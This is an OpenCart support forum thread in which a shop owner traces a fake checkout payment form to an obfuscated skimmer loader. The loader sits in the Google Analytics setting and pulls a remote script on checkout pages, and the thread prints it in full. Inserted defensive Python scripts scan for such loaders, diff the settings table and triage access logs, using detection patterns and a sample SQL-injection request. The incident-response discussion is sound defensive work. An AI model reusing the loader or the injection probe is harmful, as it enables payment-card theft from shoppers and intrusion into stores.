Post by iplocker » Wed Nov 03, 2021 3:49 pm

Hello.
It seems we've been hacked with a fake form at the checkout: https://prnt.sc/1y92zrj

[Image: Fake-Payment-Form.png, fake payment form at the OpenCart checkout]

[Image: Post-Url.png, the URL the fake form posts to]

I have compared the default installation of OC 3.0.3.6 and Journal and I've got nothing.
Also searched the DB for the
which it seems to be calling, but got nothing too.
Any other idea how to approach this?
Thanks
Last edited by iplocker on Wed Nov 03, 2021 4:07 pm, edited 2 times in total.


Post by imdevlper18 » Wed Nov 03, 2021 3:59 pm

Which payment gateway are you using?

Opencart Extensions | Professional opencart support | Support Ticket | support@cartbinder.com



Post by iplocker » Wed Nov 03, 2021 4:10 pm

We are using https://www.opencart.com/index.php?rout ... n_id=35468
But comparing the files of the extension, it seems it's not compromised; also the developer confirms that it's not his extension that was hacked.
Thanks



Post by imdevlper18 » Wed Nov 03, 2021 4:50 pm

The screenshot you showed shows that the card system was loaded within your website. The extension link that you sent shows that it takes you to the payment gateway's page.

So maybe some other payment gateway is called on your checkout. You can check the payment gateways you have installed, and disable the ones you don't use. If all are disabled and this card system is not the one that should come up, it's best to get in touch with the developer and resolve it.

Also, it's better to change all your passwords related to the server and OpenCart.


Post by paulfeakins » Wed Nov 03, 2021 6:51 pm

Contact Astra, they'll add protection and also do an audit with a load of recommendations for a developer such as ourselves to implement.

UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk



Post by JNeuhoff » Wed Nov 03, 2021 8:07 pm

Don't use the one-page checkout from Journal, that one has some serious bugs anyway.

As regards your issue with the payment gateway: You either need to contact the author of your payment extension, or the Journal support.

Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig




Post by ADD Creative » Wed Nov 03, 2021 8:14 pm

Can you work out where the script appears in the code of the web page? This might give you an idea of where it has been added from. Use your web browser's 'View page source' and the developer tools to search. The script may not be in plain text, but encoded, so you will have to check every script tag on the page for anything suspicious.

Even if you do find the location and remove it, you'll still have to work out how it was added, as the attacker will likely just add it again. It's most likely a vulnerability in your extensions or theme. The Journal theme has had vulnerabilities in the past, so check that it and your extensions are up to date.

www.add-creative.co.uk



Post by ASTRA Security Suite » Wed Nov 03, 2021 9:03 pm

Hey, here are the next steps that you can take:

1. Comparing against a default installation of OC 3.0.3.6 would have checked only core files and not files related to the extensions you have installed. There might be malware there that you would want to check for.

2. It's also possible that the malicious code is obfuscated, so a simple string search in the database wouldn't find it. You'll need to do a thorough scan after you've found the encoded malicious code.

The steps above usually solve the problem behind the symptoms you're facing. You can also read a detailed OpenCart malware removal guide here: https://www.getastra.com/blog/911/opencart-hacked/


Post by xxvirusxx » Wed Nov 03, 2021 9:56 pm

ASTRA Security Suite wrote:
Wed Nov 03, 2021 9:03 pm
1. Comparing default installation of OC 3.0.3.6 would have checked for only core files and not files related to extensions that you'd have installed.
And why not check installed extensions?

Upgrade Service | OC 2.3.0.2 PHP 8 | My Custom OC 3.0.3.8 | Buy me a beer



Post by EvolveWebHosting » Wed Nov 03, 2021 10:47 pm

iplocker wrote:
Wed Nov 03, 2021 3:49 pm
Hello.
It seems we've been hacked with a fake form at the checkout: https://prnt.sc/1y92zrj
I have compared the default installation of OC 3.0.3.6 and Journal and I've got nothing.
Also searched the DB for the
which it seems to be calling, but got nothing too.
Any other idea how to approach this?
Thanks
It would really help everyone out if you'd provide your domain and maybe some information about the extensions you have installed. Staying 'secretive' and not posting additional information makes it hard to troubleshoot. When did you notice this hack? Have you recently installed any new modules / extensions / theme on your site? When was the last time you updated your passwords, and are they strong and unique? Which version of OpenCart are you using? There's a lot that goes into the reason(s) a website gets hacked.

2 Week FREE Trial of our Shared Hosting plans (DirectAdmin or cPanel) for new customers
2 Week FREE Trial of Astra Firewall and Malware Scanner
Visit our website for full details and to start your trial today - www.evolvewebhost.com



Post by iplocker » Thu Nov 04, 2021 1:04 am

Hello.
I know it's difficult to help without saying what site it is, but that information is sensitive, you know.
I have contacted Journal Support and they found the malicious code in Google Analytics (the following code is copy-pasted from the DB):

[Image: Google-Analytics.png, the injected code in the Google Analytics setting]

Code:

    <!-- Google Tag Manager -->
    <script>
    (function(i,s,o,g,r,a,m){
      i['GoogleAnalyticsObjects']=a;
      r=s.createElement(g),m=s.getElementsByTagName(g)[0];
      // only runs when the page URL contains the decoded value of `a`
      if(i.location.href.indexOf(i.atob(a))>0){
        r.async=1;
        // the script actually loaded is the decoded value of `o`, not analytics.js
        r.src='https://'+i.atob(o);
        m.parentNode.insertBefore(r,m)
      }
    })(window,document,'YWh1YS5mZm94LnNpdGUvNmZjMWM5YTYvc3RhdC5waHA=','script','//www.google-analytics.com/analytics.js','Y2hlY2tvdQ==','ga');
    </script>
    <!-- End Google Tag Manager -->

The thing is, how did they get access to inject the code there?!

I am using the latest Journal theme 3.1.8 and OC 3.0.3.6, as I said in the first post.
OpenCart unfortunately doesn't have detailed logs of what comes in 3.0.3.7, so I don't know if they are solving any security issue.

I have compared almost all my extensions, OC and Journal, with default installations and I was unable to trace anything.
So I guess it's hard to trace the security hole.

Thanks

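ADD Creative's advice earlier in the thread (check every script tag for anything encoded) and the setting value iplocker posted come down to the same check, so here it is as an added example for this thread; it is not code from the post, from OpenCart or from Journal. It pulls the base64 string literals out of every script block, decodes them, and separates strings that look like a remote host/path from plain keywords. Run on the loader above, it shows why a file-level diff found nothing: the two base64 arguments decode to ahua.ffox.site/6fc1c9a6/stat.php and checkou, so the value sitting in the database only pulls a second-stage script on URLs containing "checkou" (the checkout page) and does nothing anywhere else. SAMPLE is the posted loader with the database escaping removed.

```python
"""Scan HTML or a setting-table value for <script> blocks that carry base64
string literals, decode them and say what the loader would do.

Added example for this thread; not code from the post, OpenCart or Journal.
SAMPLE is the loader pasted above with the DB escaping (\\') removed."""
import base64
import binascii
import re

# Constructed input: the injected config value, without the \' escaping.
SAMPLE = (
    "<!-- Google Tag Manager --> <script>(function(i,s,o,g,r,a,m){"
    "i['GoogleAnalyticsObjects']=a;r=s.createElement(g),m=s.getElementsByTagName(g)[0];"
    "if(i.location.href.indexOf(i.atob(a))>0){r.async=1;r.src='https://'+i.atob(o);"
    "m.parentNode.insertBefore(r,m)}})(window,document,"
    "'YWh1YS5mZm94LnNpdGUvNmZjMWM5YTYvc3RhdC5waHA=','script',"
    "'//www.google-analytics.com/analytics.js','Y2hlY2tvdQ==','ga');"
    "</script> <!-- End Google Tag Manager -->"
)

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
# A quoted run of base64 alphabet characters, 8+ long, optional padding.
B64_LITERAL_RE = re.compile(r"""['"]([A-Za-z0-9+/]{8,}={0,2})['"]""")
# Decoded text that looks like host[/path], with or without a scheme.
HOST_PATH_RE = re.compile(r"^(?:https?://)?[a-z0-9-]+(?:\.[a-z0-9-]+)+(?:/[\w./-]*)?$", re.I)


def decode_literal(literal):
    """Decode a candidate literal; return the text only if it is valid base64
    that yields printable ASCII (otherwise it is just an ordinary identifier)."""
    try:
        raw = base64.b64decode(literal, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def analyse(html):
    """Return one finding per script block that uses atob() or carries
    decodable base64 literals: the decoded strings, which of them are remote
    hosts/paths, and which are plain keywords (typically the URL gate)."""
    findings = []
    for body in SCRIPT_RE.findall(html):
        uses_atob = "atob(" in body
        decoded = {}
        for literal in B64_LITERAL_RE.findall(body):
            text = decode_literal(literal)
            if text is not None:
                decoded[literal] = text
        if not decoded and not uses_atob:
            continue
        remote = sorted(v for v in decoded.values() if HOST_PATH_RE.match(v))
        keywords = sorted(v for v in decoded.values() if v not in remote)
        findings.append({
            "uses_atob": uses_atob,
            "decoded": decoded,
            "remote": remote,
            "gate_keywords": keywords,
        })
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE):
        print("uses atob():", finding["uses_atob"])
        for literal, text in finding["decoded"].items():
            print(f"  {literal} -> {text}")
        print("  loads script from:", finding["remote"])
        print("  only when the URL contains:", finding["gate_keywords"])
```

Pass the text of a page saved with 'View page source', or each row of the setting table dumped to a file, to analyse(); anything that reports a remote host is worth a look, since a legitimate analytics snippet has no reason to hide its script URL behind atob(). The gate keyword is also the reason a quick look at the home page shows nothing: only a URL containing it triggers the load.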


Post by imdevlper18 » Thu Nov 04, 2021 1:36 am

Had you given access to anyone for installing the Google Tag Manager?

Or maybe you provided someone access to install some extension.

Or maybe you installed some malicious software which injected this code.

It's hard to say. Anyway, it's good that you found out.

Regarding the way to know who injected the code: it is extremely tough, because there can be N number of ways to do it.


Post by EvolveWebHosting » Thu Nov 04, 2021 7:03 am

iplocker wrote:
Thu Nov 04, 2021 1:04 am
Hello.
I know it's difficult to help without saying what site it is, but that information is sensitive, you know.
Why is it sensitive to post your domain name? No one is asking for login credentials to your website or server. Your visitors know your domain name so why is it sensitive for the Opencart users to know it?


Post by mona » Thu Nov 04, 2021 12:05 pm

You can ask to DM your site to a person here who is trying to assist you; you can also post it and delete it afterwards.

Have you ruled out that it was done by a human with access to your admin side?

I suggest you disable/remove any non-core extension you have.
It looks like something changed the Google Analytics code, which is in the setting table.
That means it looks like one of your extensions has a backdoor which can write to the setting table,
and what that means is that they can do it again, and to other settings as well.

DISCLAIMER:
You should not modify core files .. if you would like to donate a cup of coffee I will write it in a modification for you.


https://www.youtube.com/watch?v=zXIxDoCRc84


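mona's point that whatever wrote to the setting table can do it again, and to other keys, is easiest to act on with a baseline: fingerprint every row once the store is clean and diff the live table against it on a schedule, plus a content check that catches a first injection even before a baseline exists. Added example for this thread, not code from the post or from OpenCart; the rows are constructed, and the oc_ table prefix and the analytics_google_code key (the core 3.0.x Google Analytics extension's setting; Journal keeps its own) are assumptions to adjust for your install.

```python
"""Baseline-and-diff check for the OpenCart setting table, so a rewrite of the
Google Analytics value (or any other setting) shows up the next time it happens.

Added example for this thread; not code from the post or from OpenCart.
ROWS_* are constructed: in practice feed the result of BASELINE_QUERY from the
live DB. The analytics key name is assumed (core 3.0.x extension); the 'oc_'
table prefix is assumed too, check config.php for yours."""
import hashlib
import re

BASELINE_QUERY = "SELECT store_id, `code`, `key`, `value` FROM oc_setting ORDER BY setting_id"

# Content that has no business in any setting value on a store.
SUSPICIOUS = [
    re.compile(r"<script\b", re.I),
    re.compile(r"\batob\s*\(", re.I),
    re.compile(r"\beval\s*\(", re.I),
    re.compile(r"base64_decode", re.I),
    re.compile(r"String\.fromCharCode", re.I),
]

# Constructed rows as (store_id, code, key, value): a clean snapshot ...
ROWS_BASELINE = [
    (0, "config", "config_name", "Example Store"),
    (0, "config", "config_url", "https://shop.example/"),
    (0, "analytics_google", "analytics_google_status", "1"),
    (0, "analytics_google", "analytics_google_code", ""),
]
# ... and the same table after a loader of the kind seen in this thread was
# written into the analytics value (host here is a constructed example.invalid).
INJECTED = ("<!-- Google Tag Manager --> <script>(function(i,s,o,g,r,a,m){"
            "if(i.location.href.indexOf(i.atob(a))>0){r=s.createElement(g);"
            "r.src='https://'+i.atob(o);s.head.appendChild(r)}})"
            "(window,document,'ZXhhbXBsZS5pbnZhbGlkL3N0YXQucGhw','script',0,'Y2hlY2tvdQ==');"
            "</script>")
ROWS_NOW = [r if r[2] != "analytics_google_code" else (r[0], r[1], r[2], INJECTED)
            for r in ROWS_BASELINE]


def fingerprint(rows):
    """Map (store_id, code, key) -> sha256 of the value. Small enough to save to
    a file after every legitimate settings change and keep under version control."""
    return {(s, c, k): hashlib.sha256(v.encode("utf-8")).hexdigest() for s, c, k, v in rows}


def diff_settings(baseline_fp, rows):
    """Compare live rows against a saved fingerprint. Returns (changed, added, removed)."""
    now = fingerprint(rows)
    changed = sorted(k for k in now if k in baseline_fp and now[k] != baseline_fp[k])
    added = sorted(k for k in now if k not in baseline_fp)
    removed = sorted(k for k in baseline_fp if k not in now)
    return changed, added, removed


def suspicious_values(rows):
    """Return [(key, matched_pattern)] for values that look like injected code,
    which catches a first compromise even when no baseline exists yet."""
    hits = []
    for s, c, k, v in rows:
        for pat in SUSPICIOUS:
            if pat.search(v):
                hits.append(((s, c, k), pat.pattern))
                break
    return hits


if __name__ == "__main__":
    changed, added, removed = diff_settings(fingerprint(ROWS_BASELINE), ROWS_NOW)
    print("changed:", changed, "added:", added, "removed:", removed)
    for key, pat in suspicious_values(ROWS_NOW):
        print("suspicious value in", key, "matches", pat)
```

Run the diff from cron against a fingerprint file written right after the cleanup; any changed key you did not touch yourself is the backdoor firing again, and the key it hit tells you which extension's settings to look at first. Extend SUSPICIOUS with whatever your own theme legitimately never stores in a setting.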

Post by paulfeakins » Thu Nov 04, 2021 7:46 pm

JNeuhoff wrote:
Wed Nov 03, 2021 8:07 pm
Don't use the one-page checkout from Journal
Don't use ANYTHING from Journal :laugh:


Post by nickpapoutsis » Fri Nov 05, 2021 12:31 pm

paulfeakins wrote:
Thu Nov 04, 2021 7:46 pm
Don't use ANYTHING from Journal :laugh:
Everyone loves to hate on Journal, but there's absolutely nothing as feature-rich and stable as Journal's latest versions.

And no, the default theme is extremely restrictive, unless you have enough money and a team of developers to replicate Journal's most basic features.

I'd love to be able to suggest something else, but it's either the default one (maybe with some extra CSS like yours) or Journal; everything else is "my way or the highway", if they even work properly.


Post by iplocker » Fri Nov 05, 2021 8:53 pm

I don't know from where the malicious code has been injected, as we never give access to third parties and we also install extensions from the OpenCart Marketplace.
So it's hard to investigate further, so the only thing we can do is take the basic steps we see on some sites and on the Astra blog to secure the site.
Also, OpenCart releases would help if they came with more details about the new versions. I mean, we have 3.0.3.6 and we see in the log details of the new 3.0.3.7:
3.0.3.8 RTL related issues resolved Resolved other Github issues. Version released by https://webkul.com/
So it's not possible to know if there are security fixes or not.
OpenCart needs logs with the specific things that they have made.
Thanks



Post by EvolveWebHosting » Fri Nov 05, 2021 9:02 pm

iplocker wrote:
Fri Nov 05, 2021 8:53 pm
I don't know from where the malicious code has been injected, as we never give access to third parties and we also install extensions from the OpenCart Marketplace.
So it's hard to investigate further, so the only thing we can do is take the basic steps we see on some sites and on the Astra blog to secure the site.
Also, OpenCart releases would help if they came with more details about the new versions. I mean, we have 3.0.3.6 and we see in the log details of the new 3.0.3.7:
3.0.3.8 RTL related issues resolved Resolved other Github issues. Version released by https://webkul.com/
So it's not possible to know if there are security fixes or not.
OpenCart needs logs with the specific things that they have made.
Thanks
Best of luck to you in getting this resolved. Unfortunately, I'm unable to help any further without a URL for your website.


Post by ADD Creative » Tue Nov 09, 2021 1:20 am

iplocker wrote:
Fri Nov 05, 2021 8:53 pm
I don't know from where the malicious code has been injected, as we never give access to third parties and we also install extensions from the OpenCart Marketplace.
So it's hard to investigate further, so the only thing we can do is take the basic steps we see on some sites and on the Astra blog to secure the site.
Also, OpenCart releases would help if they came with more details about the new versions. I mean, we have 3.0.3.6 and we see in the log details of the new 3.0.3.7:
3.0.3.8 RTL related issues resolved Resolved other Github issues. Version released by https://webkul.com/
So it's not possible to know if there are security fixes or not.
OpenCart needs logs with the specific things that they have made.
Thanks
Sadly there are no detailed change logs, but you can see the commit history.
https://github.com/opencart/opencart/co ... ...3.0.3.7
https://github.com/opencart/opencart/co ... ...3.0.3.8

There were a few security patches. These would be unlikely to be the cause, unless you clicked on a malicious link that went to your admin and you then logged in. It's far more likely to be a flaw in an extension or your theme. Finding the cause can be hard. Some things to check would be:

Check your files against clean downloads of the same versions of OpenCart, your theme and your extensions.

Check both the OpenCart and PHP error logs. These might give you a clue, as some attacks or attempted attacks will generate errors. Certain attacks rely on error messages, so make sure your site has them switched off in all 3 places that need to be set to off.

Check your web access log around the time you think everything happened. Look for GET requests with suspicious query strings, such as SQL inserts or some sort of encoding. Look for POST requests that seem out of place or from uncommon user agents. Look for access to your admin from unknown IP addresses.

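The three access-log checks in the post above (encoded or SQL payloads in GET query strings, POSTs from uncommon user agents, admin hits from IPs you do not recognise) are mechanical enough to script, which matters when the window to search is days of log. Added example for this thread, not code from the post or from OpenCart: it parses combined-format lines (Apache and nginx default) and reports each suspicious line with its reasons. The log lines are constructed, not from the affected site, and KNOWN_ADMIN_IPS and the /admin/ folder name are assumptions to replace with your own.

```python
"""Triage a combined-format web access log for encoded/SQL payloads in GET
query strings, POSTs from uncommon user agents, and admin access from unknown IPs.

Added example for this thread; not code from the post or from OpenCart.
SAMPLE_LOG lines are constructed; KNOWN_ADMIN_IPS and ADMIN_PATH are assumptions."""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

KNOWN_ADMIN_IPS = {"203.0.113.10"}   # assumed: your office / VPN egress addresses
ADMIN_PATH = "/admin/"               # assumed: default folder; change it if you renamed admin

# Things that do not belong in a shop's query string.
SQLI_RE = re.compile(
    r"union\s+select|insert\s+into|information_schema|sleep\s*\(|benchmark\s*\(|"
    r"0x[0-9a-f]{8,}|base64_decode|eval\s*\(|<script",
    re.I,
)
# Real browsers announce themselves as Mozilla/ or Opera/; tools and scripts do not.
BROWSER_UA_RE = re.compile(r"^Mozilla/|^Opera/")

# Constructed sample lines (RFC 5737 test addresses), not from the affected site.
SAMPLE_LOG = [
    '203.0.113.10 - - [03/Nov/2021:09:12:01 +0000] "GET /admin/index.php?route=common/dashboard HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/93.0"',
    '198.51.100.77 - - [03/Nov/2021:09:15:44 +0000] "GET /index.php?route=product/search&search=%27%20union%20select%201%2C2%2C3-- HTTP/1.1" 200 812 "-" "python-requests/2.25.1"',
    '198.51.100.77 - - [03/Nov/2021:09:16:02 +0000] "POST /index.php?route=account/register HTTP/1.1" 200 44 "-" "curl/7.64.1"',
    '198.51.100.77 - - [03/Nov/2021:09:20:13 +0000] "GET /admin/index.php?route=common/login HTTP/1.1" 200 3020 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/95.0"',
    '192.0.2.5 - - [03/Nov/2021:09:21:30 +0000] "GET /index.php?route=product/product&product_id=42 HTTP/1.1" 200 9311 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) Safari/605.1"',
]


def classify(line):
    """Return the reasons one log line is suspicious; an empty list means clean."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    # Decode twice so %2527-style double encoding does not hide a quote.
    path = unquote(unquote(m["path"]))
    query = path.partition("?")[2]
    if m["method"] == "GET" and SQLI_RE.search(query):
        reasons.append("sql/encoded payload in query string")
    if m["method"] == "POST" and not BROWSER_UA_RE.match(m["ua"]):
        reasons.append(f"POST from uncommon user agent: {m['ua']}")
    if path.startswith(ADMIN_PATH) and m["ip"] not in KNOWN_ADMIN_IPS:
        reasons.append(f"admin access from unknown IP {m['ip']}")
    return reasons


def triage(lines):
    """Return [(line_no, ip, timestamp, reasons)] for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((n, m["ip"] if m else "?", m["ts"] if m else "?", reasons))
    return hits


if __name__ == "__main__":
    for n, ip, ts, reasons in triage(SAMPLE_LOG):
        print(f"line {n} {ip} [{ts}]: " + "; ".join(reasons))
```

Feed it the lines around the time the setting changed (the oc_setting row has no timestamp, so bracket it with the last known-clean backup and the first customer report) and look at the IPs that show up in more than one category; in the constructed sample the same address probes the search route, POSTs with curl and then reaches the admin login, which is the sequence worth pulling every line for. A POST from a non-browser agent to an extension route you do not recognise is the one to chase first, since that is how a file upload or settings write through a vulnerable extension looks from the outside.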

Post by vidalleke » Tue May 17, 2022 9:14 pm

We also got hacked with the same method!
